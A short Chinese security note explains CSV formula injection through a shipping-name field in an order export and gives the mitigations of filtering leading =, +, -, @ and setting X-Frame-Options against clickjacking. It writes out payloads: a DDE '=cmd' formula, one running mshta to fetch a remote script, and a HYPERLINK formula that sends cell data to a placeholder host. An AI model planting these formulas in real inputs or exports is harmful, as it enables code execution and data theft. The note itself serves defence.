赞
踩
csv 注入
用户下单时,收货人姓名为 =cmd|A1!A1 ,下单后 在订单系统可导出订单到csv , 则=cmd|A1!A1 则在csv 的收货人列中的某单元格中, 是可以触发打开cmd 的,黑客是可以通过cmd 做一些危险操作,比如: =+1+cmd|’/c mshta.exehttp://192.168.233.102:8080/a’!A0
=HYPERLINK(“http://vps_ip?test=”&A2&A3,“Error: Please click me!”) 这种 可把csv 中的数据泄露
方案: 输入文本中=,+,-,@ 需要过滤
点击挟持:ngnix 增加X-frame-options :always 配置 确保不会出现iframe 覆盖页面,篡改点击请求
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。